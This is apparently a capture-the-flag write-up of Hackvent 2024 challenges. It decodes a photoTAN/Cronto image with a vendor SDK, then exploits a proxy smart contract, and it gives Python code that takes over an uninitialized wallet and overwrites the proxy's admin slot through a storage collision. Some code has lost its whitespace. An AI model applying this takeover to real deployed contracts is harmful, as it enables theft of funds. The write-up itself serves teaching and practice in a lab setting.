The three leet challenges presented challenges about Android reversing, smart contract exploitation, and a Linux binary exploitation challenge. I was only able to complete the first two during this Hackvent season.
Santa was reading through wishes from children, when he suddenly found this very suspicious, colorful image. Can you help him decode it?
</picture>
Background
The first challenge here is identifying the data scheme used in the middle of the ball. It’s part of a multi-factor authentication scheme known as “photoTAN”. The protocol is discussed in this paper, but it doesn’t go into how the data is encoded. This form of auth is common in German banks (such as Commerzbank and Deutsche Bank).
The technology behind this is Cronto Visual Transaction Signing from OneSpan. Their encoding scheme is proprietary, and they’ve apparently been hostile to those who attempt to reverse engineer it and publish decoders.
Solve Via SDK
This is how I originally solved the challenge.
SDK
OneSpan does offer an SDK for interacting with these codes, the Mobile Security Suite SDKs. I’ll create an account and download this. In the Zip, there are more archives:
I’ll unzip the Image Scanner, and find it has a sample application:
oxdf@hacky$ls MSS\ 4.36.0/Image\ Scanner\ SDK/Android/
Bin Documentation Sample
I’ll install Android Studio, and then build this application with gradle, abut it runs into an issue:
oxdf@hacky$./gradlew clean build
> Configure project :app
...[snip]...
FAILURE: Build failed with an exception.
* What went wrong:
Execution failed for task ':app:checkDebugAarMetadata'.
> Could not resolve all files for configuration ':app:debugRuntimeClasspath'.
> Could not find :QRCodeScannerSDK:.
Searched in the following locations:
- file:/media/sf_CTFs/hackvent2024/day11/MSS%204.36.0/Image%20Scanner%20SDK/Android/Sample/app/aars/QRCodeScannerSDK.aar
Required by:
project :app
...[snip]...
BUILD FAILED in 1s
3 actionable tasks: 3 executed
It can’t find Android/Sample/app/aars/QRCodeScannerSDK.aar. That file is given in the SDK Bin directory, so I’ll make a copy where it’s looking (there’s probably a more supported way to get this library available, but this worked for my purposes).
On the next run, it fails because of my Java version (too new?). This is set in app/build.gradle:
Some playing around with this, there’s actually a slight change I’ll make to the code to make it work a bit more nicely.
Many directories into src/main there’s a file named QrCodeScannerSampleActivity.java. This is where the application makes the call to the SDK and shows the result. Specifically, there’s a onActivityResult function:
@OverrideprotectedvoidonActivityResult(intrequestCode,intresultCode,Intentdata){super.onActivityResult(requestCode,resultCode,data);if(resultCode==RESULT_OK){// The result is returned as an extraintscannedImageFormat=data.getIntExtra(QRCodeScannerSDKConstants.OUTPUT_CODE_TYPE,0);StringscannedImageData=data.getStringExtra(QRCodeScannerSDKConstants.OUTPUT_RESULT);Stringformat=scannedImageFormat==QRCodeScannerSDKConstants.CRONTO_CODE?"Cronto Sign":"QR Code";Log.d(TAG,"Scanned image data = "+scannedImageData);Log.d(TAG,"Scanned image format = "+format);resultTextView.setText(scannedImageData);resultTextType.setText(getResources().getString(R.string.scanned_data_info,format));}elseif(resultCode==RESULT_CANCELED){resultTextView.setText(getResources().getString(R.string.scan_cancelled));resultTextType.setText("");}elseif(resultCode==QRCodeScannerSDKConstants.RESULT_ERROR){// Get returned exceptionQRCodeScannerSDKExceptionexception=(QRCodeScannerSDKException)data.getSerializableExtra(QRCodeScannerSDKConstants.OUTPUT_EXCEPTION);onExceptionThrown(exception);}}
The call to resultTextView.setText is where the result is set to the screen. The resulting data is in hex, but I’d rather it be ASCII. I’ll add a function to do that:
There’s a demo application from OneSpan available here. I’ll download it and run it from my old Android phone. On running the app, I’ll need to select the “My Bank” application and skip the request to login. Then I’ll get a menu:
I’ll select “Scan a Cronto”, and it launches the camera. On scanning the code, it pops up asking me to choose a pin. I’ll enter whatever to get past this, and it fails with an error.
Tapping the gear at the top right, then “Advanced Features” –> “Recent activity logs” shows a failed “Orchestration profile activation with scan”. Going into the details, the flag is there:
Unwrap a festive smart contract vulnerability where storage regions become your playground and holiday cheer meets digital mischief. Ho ho ho… or is it hax hax hax?
Start the service, analyze the resource and get the flag.
The docker instance presents a webpage with information about the challenge:
Contract Analysis
Proxy.sol
This contract is a Proxy patterned smart contract, as discussed in this blog post. It explicitly defines memory locations meant to hold two values, ADMIN_SLOT and IMPLEMENTATION:
The constructor as well as the functions for getting and setting the admin and the implementation then use the sstore and sload instructions to read store and load the values into those addresses:
If coin is sent to this contract, or if any other functions are called on it (fallback), it will call _delegate, which will get the current implementation address, and then use calldatacopy and delegatecall to execute the called function from the implementation contract.
The important thing to note about delegatecall is that it calls a function from another contract, but within the memory space of the calling contract! It is very important that the memory layout of the two contracts matches or issues will arise.
Wallet3.sol
The three Wallet .sol files are similar, and Wallet3.sol is the only one that has the function needed to complete this challenge.
All three wallet contracts have functions for initialization, sending, getting it’s owner. Wallet3 one also has a “notes” capability, where notes can be set and retrieved.
// SPDX-License-Identifier: UNLICENSED
pragmasolidity^0.8.13;contractWallet3{addressprivateowner;bytes32[]privatenotes;eventNoteAdded(bytes32note,uint256index);eventSent(addressrecipient);modifieronlyOwner(){require(tx.origin==owner,"nope");_;}functioninitialize59ad(address_owner)public{require(owner==address(0),"nope");owner=_owner;}functionsend47de(addressrecipient)publiconlyOwner{(boolsuccess,)=payable(recipient).call{value:0.5ether}("");require(success,"Recipient should accept ether");emitSent(recipient);}functionaddNote3dee(bytes32note)publiconlyOwner{notes.push(note);emitNoteAdded(note,notes.length-1);}functiongetOwner15569()publicviewreturns(address){returnowner;}functiongetNote179e(uint256index)publicviewreturns(bytes32){returnnotes[index];}receive()externalpayable{}}
Connect to Blockchain
Curl
I can query the RPC endpoint with curl to get my chain id:
Then I can import and account and give the private key from the webpage:
Python
The thing I will use the most is Python. I’ll use the Solidity Compilersolc to compile the contracts into a JSON file:
oxdf@hacky$solc --optimize--combined-json abi,bin -o compiled Proxy.sol Wallet1.sol Wallet2.sol Wallet3.sol
Warning: Transient storage as defined by EIP-1153 can break the composability of smart contracts: Since transient storage is cleared only at the end of the transaction and not at the end of the outermost call frame to the contract within a transaction, your contract may unintentionally misbehave when invoked multiple times in a complex transaction. To avoid this, be sure to clear all transient storage at the end of any call to your contract. The use of transient storage for reentrancy guards that are cleared at the end of the call is safe.
--> Wallet1.sol:13:13:
|
13 | tstore(0, 1)
| ^^^^^^
oxdf@hacky$ls compiled/
combined.json
I can use that file to get access to functions on the contracts. I’ll start with imports and constants:
If I want to call wallet functions through the Proxy contract, I’ll need to create “contracts” for those as well. I’ll do that by loading a contract with the ABI from the wallet and the address of the proxy:
The owner values for the three wallet contracts are all null. That means I can call the initialize59ad function and set my address as owner, and then run any function in each contract.
It seems that the implementation contract is rotating periodically.
Memory Analysis
There’s an article on Alchemy called What is Smart Contract Storage Layout that is very good at explaining how memory is laid out. Every variable is mapped into a “slot”, starting at slot 0. Slots are 32 bytes, and each contract has 2256 slots.
I already saw above where the Proxy contract was explicitly defining the slot numbers for it’s two variables.
In Wallet3, there are two variables, owner and notes. owner, as a statically sized object less than 32 bytes in size, just takes a slot, filling slot 0.
notes is a dynamically-sized variable, an array that can grow to any size. For these, the length of the array is stored in the next slot (so for Wallet3, slot 1). The successive items in the array are stored in the slot calculated as the keccak256 hash of the slot id (borrowing a diagram from the documentation):
keccak256(1) is 0xb10e2d527612073b26eecdfd717e6a320cf44b4afac2b0732d9fcbe2b7fa0cf6, as calculated by CyberChef:
Exploit
Strategy
Becausae it has not been initialized, I can call the initialize59ad function on Wallet3 and become the owner of it. This allows me to add notes.
I’ll wait for Wallet3 to be the implementation, and then call addNote3dee through the proxy, writing notes into the proxy’s memory.
So on writing the 11th note, it’ll overwrite the value for the admin user.
Python
I’ll add code to change the Wallet3 owner to me:
wallet3_owner=get_wallet_owner("Wallet3")ifwallet3_owner=="0x0000000000000000000000000000000000000000":print(f"Changing wallet3 to be owned by me: {my_addr}")tx=contracts["Wallet3"].functions.initialize59ad(my_addr).transact()receipt=web3.eth.wait_for_transaction_receipt(tx)print_wallet_owners()elifwallet3_owner==my_addr:print("Wallet3 already owned by me")else:print("Wallet3 initialized to someone else. Exiting.")sys.exit()
The first time I run this, it changes the owner to me:
oxdf@hacky$python solve.py 275e60da-2282-4300-99ad-b4ff7b4177b2.i.vuln.land
My address: 0x8469afEae8B562Ab9653775BE6ace82E1A304869
Wallet1: 0x0000000000000000000000000000000000000000
Wallet2: 0x0000000000000000000000000000000000000000
Wallet3: 0x0000000000000000000000000000000000000000
Proxy: 0xED062CFaCcbaFC3789636c1d19e74CA80e05b7b0
Implementation: 0xFbB9B1F83ba703E1A5E6A92C7f892B33Cda3299c (Wallet1)
Admin: 0xED062CFaCcbaFC3789636c1d19e74CA80e05b7b0
Changing wallet3 to be owned by me: 0x8469afEae8B562Ab9653775BE6ace82E1A304869
Wallet1: 0x0000000000000000000000000000000000000000
Wallet2: 0x0000000000000000000000000000000000000000
Wallet3: 0x8469afEae8B562Ab9653775BE6ace82E1A304869
Proxy: 0xED062CFaCcbaFC3789636c1d19e74CA80e05b7b0
The next time, it just skips that as it’s already me (and would fail if I tried to initialize as the value isn’t all nulls):
oxdf@hacky$python solve.py 275e60da-2282-4300-99ad-b4ff7b4177b2.i.vuln.land
My address: 0x8469afEae8B562Ab9653775BE6ace82E1A304869
Wallet1: 0x0000000000000000000000000000000000000000
Wallet2: 0x0000000000000000000000000000000000000000
Wallet3: 0x8469afEae8B562Ab9653775BE6ace82E1A304869
Proxy: 0xED062CFaCcbaFC3789636c1d19e74CA80e05b7b0
Implementation: 0xe5ed47BCC12028b9be183A80b8821119E9397eF7 (Wallet3)
Admin: 0xED062CFaCcbaFC3789636c1d19e74CA80e05b7b0
Wallet3 already owned by me
Now I need code to wait for Wallet3 to be the implementation value:
whileTrue:current_implementation=get_current_implemtnation()print("\r"+100*"",end="")print(f"\rCurrent Implementation is {[wforw,ainwallets.items()ifa.lower()==current_implementation.lower()][0]}",end="")ifcurrent_implementation.lower()==wallets["Wallet3"].lower():breakfor_inrange(10):sleep(1)print(".",end="",flush=True)print()
I’ve made a loop that checks every 10 seconds, printing a “.” to show waiting every one second.
When it is Wallet3, I want to write 11 notes. I’ll create a write_note function:
Printing the receipt is a bit verbose, but useful for troubleshooting.
I’ll need the 6th note to be the address or Wallet3 so that the implementation value is still right. The 11th should be my address.
for_inrange(10):write_note(wallets["Wallet3"])sleep(0.5)write_note(my_addr)admin=get_admin()ifadmin.lower()==my_addr.lower():print(f"Success! Admin is me: {admin}")else:print(f"Something went wrong. Admin is: {admin}")
It is possible that this breaks while it’s running. For example, if the implementartion contract is changed to something that isn’t Wallet3 while trying to write notes, or if I run out of gas (there’s a “Get Magic” button on the page to get more). I could manually add the right amount of notes, or just get a fresh instance. I could also look at making the code more robusts, checking for existing notes before writing, but this is good enough for getting the flag:
Clicking “Validate Challenge” back on the website returns the flag:
Flag: HV24{SANT4_MIN3S_BL0CKS_4_MERRYC01NS}
HV24.13
Challenge
HV24.13 Server Hypervisor
Categories:
EXPLOITATION
Level:
leet
Author:
.fabi07
In order to afford all the presents this year, Santa wanted to start his own little SaaS business, as he had heard that they were quite profitable. He decided to build his own custom web server hypervisor. But he suspects that some evil force may have punched a few holes in his perfect defense. Can you help him find them?
Hint: Santa said you should focus on the global variables.
There’s both a downloadable and a Docker.
Resources
The downloaded zip archive has two files:
oxdf@hacky$unzip resource.zip
Archive: resource.zip
inflating: Dockerfile
inflating: main
main is an ELF binary:
oxdf@hacky$file main
main: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=3651c081dd3541e3cdf52f6ee11dfd859e3b5942, for GNU/Linux 3.2.0, with debug_info, not stripped
Dockerfile runs a container running main:
# First stage: Build Libevent using system packagesFROM ubuntu:22.04RUN apt update && apt install-y git gcc make cmake
RUN git clone https://github.com/libevent/libevent.git /libevent/
# Install dependencies and Libevent from package repository# RUN apt update && apt install -y libevent-devRUN cd /libevent/ &&mkdir build &&cd build && cmake .. && make && make installCOPY ./main /code/mainCOPY ./flag.txt /code/flag.txtRUN chmod +x /code/main
ENV LD_LIBRARY_PATH="/usr/local/lib"# Final stage is minimal with only dependencies and binaryCMD ["/code/main"]
The libevent API provides a mechanism to execute a callback function when a specific event occurs on a file descriptor or after a timeout has been reached. Furthermore, libevent also support callbacks due to signals or regular timeouts.
libevent is meant to replace the event loop found in event driven network servers. An application just needs to call event_dispatch() and then add or remove events dynamically without having to change the event loop.
I wasn’t able to complete this challenge during the timeframe for the competition.
OPEN_SOURCE_INTELLIGENCE
ANDROID
REVERSE_ENGINEERING
Click for full size image
Click for full size image
Click for full size image
Click for full size image
EXPLOITATION
